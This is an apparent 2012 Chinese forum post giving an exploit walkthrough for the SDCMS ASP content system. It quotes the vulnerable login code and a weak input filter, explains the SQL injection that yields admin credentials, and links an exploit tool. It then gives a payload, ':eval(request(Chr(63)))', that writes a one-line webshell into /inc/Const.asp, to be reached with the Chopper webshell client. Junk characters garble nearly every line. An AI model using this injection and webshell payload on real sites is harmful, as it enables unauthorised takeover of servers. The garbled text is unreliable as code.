作者:T00LS 鬼哥& T- G1 X# W' p5 O j* g7 P
漏洞文件:后台目录/index.asp
x/ y9 {2 s& t& K+ d( M9 p$ U; S! v
Sub Check( J3 p2 k. _8 U0 i% g+ M" H
Dim username,password,code,getcode,Rs) c0 i# j: q& ^% h d1 e6 n N
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
; ?8 [" g4 g z) t username=FilterText(Trim(Request.Form("username")),1)
5 U7 L2 d X) f, K+ f password=FilterText(Trim(Request.Form("password")),1)
5 ^% [ H2 J8 v' n% X code=Trim(Request.Form("yzm"))& [: j# `+ ^2 M( M% Y
getcode=Session("SDCMSCode")
4 Y$ Y: I" L4 r6 V1 h9 ? IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died' u( U! t4 U9 ?
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
g6 u- K1 o* ~6 \ c- Q IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied( o F8 A1 a5 B' a' f
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
6 n- P" H0 V) e7 V# Q% Y P IF username="" or password="" Then
4 K5 D( W2 A, I0 k& a: H* }/ a Echo "用户名或密码不能为空"ied
p5 {/ H/ o: O/ X1 m A- E0 e Else
" } i7 D% t/ x6 G7 V8 B Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
( O% r0 k( i8 F1 K7 p IF Rs.Eof Then
- D( _, A% N7 v; u AddLog username,GetIp,"登录失败",1$ | J$ W* Z! o% t3 y: I
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
& m" N( J+ @! z1 S) Z Else
' p! G7 `" S9 M. S( D Add_Cookies "sdcms_id",Rs(0)
1 S0 @% k7 G9 |4 C/ d, S Add_Cookies "sdcms_name",username9 T c! |2 a. _
Add_Cookies "sdcms_pwd",Rs(2). Z0 @% c) M2 E- p" O
Add_Cookies "sdcms_admin",Rs(3)
9 z+ l# l+ I% Y0 k! j' J" V9 l Add_Cookies "sdcms_alllever",Rs(4)
) ]& l. m) A( t5 _- f5 ~0 s Add_Cookies "sdcms_infolever",Rs(5)9 e: P% ~3 c- P9 J0 ~8 Z. I
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")" t+ a, b2 B% B' B; J) e3 z* X
AddLog username,GetIp,"登录成功",1$ G0 T' W" _. G y, O
'自动删除30天前的Log记录
`( b6 i& Q2 i- x% G' d IF Sdcms_DataType Then
( L2 ?9 H- L4 J# J( \! B0 e- B Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")0 v6 N [9 u }, w
Else N+ P3 M& N6 i& U
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
! F+ [# J! s+ R% V End IF
2 ^% Z+ Q! \) l. l5 N" S Go("sdcms_index.asp")
" @& e# s7 a' z( g7 x3 H- U5 V End IF8 n9 _ h0 e: d4 U7 K k
Rs.Close
- ~1 Y* O/ @& f+ X- t0 F/ t Set Rs=Nothing
- k0 o' X( s% Q End IF
8 D& o# D. N; r# F! ], \: bEnd Sub
6 [; |5 P, J* b {- `7 \( G( }, q% ?0 Q2 _
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
, y/ s, O9 L+ s5 c2 [! U e; A! a3 Z! P- ?
Function FilterText(ByVal t0,ByVal t1)
; @, Q7 t w. o' y IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
8 |) d$ X; W) U7 I t0=Trim(t0)5 C; |+ _0 {2 K
Select Case t1
" U- |9 Y8 j. K$ Y' B6 U Case "1"
; G/ c2 p3 F* q6 n# }& N S t0=Replace(t0,Chr(32),"")* [2 F/ u& z8 x& [& D
t0=Replace(t0,Chr(13),"")
& t4 o5 s D$ \# O t0=Replace(t0,Chr(10)&Chr(10),"")/ V+ i. Y1 g j' [# ]6 P
t0=Replace(t0,Chr(10),"")
# [7 H$ M r+ ]! F Case "2"* e& Y9 g, R" s$ ]1 M9 C
t0=Replace(t0,Chr(8),"")'回格" r" V/ W5 e& b" H
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
. N2 ?# J" E& s3 ~- V2 n, e( g" ^ t0=Replace(t0,Chr(10),"")'换行
: G0 a3 G$ D1 c3 ^# e" X t0=Replace(t0,Chr(11),"")'tab(垂直制表符)) K" l O! Z: O B8 `4 H( ~% q/ e, M
t0=Replace(t0,Chr(12),"")'换页
i( q/ y$ B- Q/ J& C i t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
0 A+ V u' L ^2 b: m& ?7 q t0=Replace(t0,Chr(22),""); ^' ^0 _) f' \
t0=Replace(t0,Chr(32),"")'空格 SPACE
! O$ s5 B, D8 C t0=Replace(t0,Chr(33),"")'!! a; I+ I9 c4 n& o" r" D
t0=Replace(t0,Chr(34),"")'") Y+ p$ n; {- I0 D! K+ m1 p
t0=Replace(t0,Chr(35),"")'#
8 @$ u( e! ?$ ^& B t0=Replace(t0,Chr(36),"")'$0 M8 _: R5 ]* X3 J( E. q
t0=Replace(t0,Chr(37),"")'%
. u* I1 w! i& [/ Q+ G0 c0 K t0=Replace(t0,Chr(38),"")'&0 I9 `, v ^8 I C( h, L
t0=Replace(t0,Chr(39),"")''6 O. \; A2 j# V: |! \ I
t0=Replace(t0,Chr(40),"")'(
2 E& Y& l& v$ t7 B$ U2 | t0=Replace(t0,Chr(41),"")')
. ?2 t, L0 w; u0 w' o/ n t0=Replace(t0,Chr(42),"")'*
) V7 ]" q) D5 C' ^ b E# o: t0 q$ i t0=Replace(t0,Chr(43),"")'+% `# w$ m" S1 g( R& o v
t0=Replace(t0,Chr(44),"")',
4 V2 W/ S+ y+ d4 e% l c8 F9 Y t0=Replace(t0,Chr(45),"")'-2 _# J/ O* ~) P# E7 i
t0=Replace(t0,Chr(46),"")'.* ]) [ q4 t+ T5 m
t0=Replace(t0,Chr(47),"")'/, f% E1 r/ F/ c& k; R( N7 M, C1 u
t0=Replace(t0,Chr(58),"")':6 }- e& A$ F6 y7 k5 `
t0=Replace(t0,Chr(59),"")';8 R( Q+ o$ S* O, M# n- g) k
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>( q1 V8 r- o% |9 N- K4 P# b+ B8 \
t0=Replace(t0,Chr(63),"")'?! `& R) \2 W) \& ^
t0=Replace(t0,Chr(64),"")'@4 I0 v* e% j# ?, R$ _
t0=Replace(t0,Chr(91),"")'\- l4 o% z( M$ u- S) e' J
t0=Replace(t0,Chr(92),"")'\
# @( Y0 |3 S4 S: d& O t0=Replace(t0,Chr(93),"")']. `% H) G* T" G" a- f
t0=Replace(t0,Chr(94),"")'^+ [4 w3 N, t0 o S! ^! U f% h! _
t0=Replace(t0,Chr(95),"")'_
. I4 T, ^; _* M" ^+ _ t0=Replace(t0,Chr(96),"")'`
4 C0 r' \9 j, s" z. { V/ S& d t0=Replace(t0,Chr(123),"")'{# p& r) u) l3 P( o: s
t0=Replace(t0,Chr(124),"")'|
- h2 Y; |' r- C+ w$ { t0=Replace(t0,Chr(125),"")'}3 \) J1 n M. f9 o& U8 Z
t0=Replace(t0,Chr(126),"")'~6 P* ]( J7 y' ]4 w3 K' K9 h
Case Else% {0 k, u- b! t; |9 R0 C& p
t0=Replace(t0, "&", "&")
6 H m8 m" [6 U4 y# f7 H: r t0=Replace(t0, "'", "'")
+ s8 g8 I3 a) _! z* g t0=Replace(t0, """", """)0 Y |! [/ S& S U
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">"). ^- M" Q5 U! b, A! `- C7 c
End Select
: H c% r" }( S2 v% i IF Instr(Lcase(t0),"expression")>0 Then
& K3 f- f# v2 z" c! i t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
( A: |# D6 s) j; Q( ^& t End If* s9 }% [- t9 C( D# E! g7 C
FilterText=t08 p2 C. a _1 _. L
End Function
* E* J# @$ C# h9 {7 s, N5 O0 H) N6 l) @3 ~& R& r+ [
看到没。直接参数是1 只过滤
5 I7 A) ^: f0 W( Z' `' u t0=Replace(t0,Chr(32)," ")/ {5 l. v: [& H: x& L% f! M
t0=Replace(t0,Chr(13),"")# o6 o# w9 n6 ]
t0=Replace(t0,Chr(10)&Chr(10),"
+ Q5 [7 d! \' r- |; Y")* v, q6 A. Q/ H- ]# F" C7 `
t0=Replace(t0,Chr(10),"* E& _$ g6 P. g' n; [8 j
")' @3 v" I6 f$ c: W/ t8 L( @2 _) s
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
, l X$ q, S2 \) ^& O) n# b# cEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
/ c" ^$ |* s7 ~9 C2 U& ]
. J7 z; U" l5 t2 W$ e; i2 }$ o8 r测试:; d7 U. V Q) f0 p/ y
8 E) k# N8 o* N1 Z; e& z
! f5 G+ o0 B/ u9 o* J- M现在输入工具上验证码,然后点OK
# a& z; X2 [+ X/ k' M+ y
/ N- K/ X; D6 X4 b0 {! F$ o/ B7 }( u# f* c/ ^& T
看到我们直接进入后台管理界面了,呵呵!
8 f6 a6 F* {! Q2 G/ T( _1 \
, j C4 z: t7 p- o: W. ~" z( @# s; N( D4 `
" {$ R0 j3 E$ n5 g. P3 C# a这样直接进入后台了。。。。
; L4 q A' [# J G) w5 H1 a1 ~/ y* v' H6 d2 b" u
/ S1 v2 T/ S( {% g9 A$ R1 \) r! B% e# `" X o0 x& ~
SDCMS提权:% @# N7 E% A) i& E
7 P, K$ R+ n5 J
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
0 y a: U2 f0 C
: U' y7 K' _4 p
8 y" B+ V2 K$ v: H8 s! s) @" h9 _$ |
OK,现在用菜刀连接下!
! ?- ~& W7 y& ?+ T5 }. E6 r
$ H3 r x5 g" E9 F7 O- Y( j( W) f; B2 c1 Z5 ^* _
& X/ G# q2 Y7 {( k1 g! }/ k! Z1 r + @8 P6 Z1 A, r
4 M: @$ j" s. C# K |
发表于 2012-11-9 20:57:02
收藏
支持
反对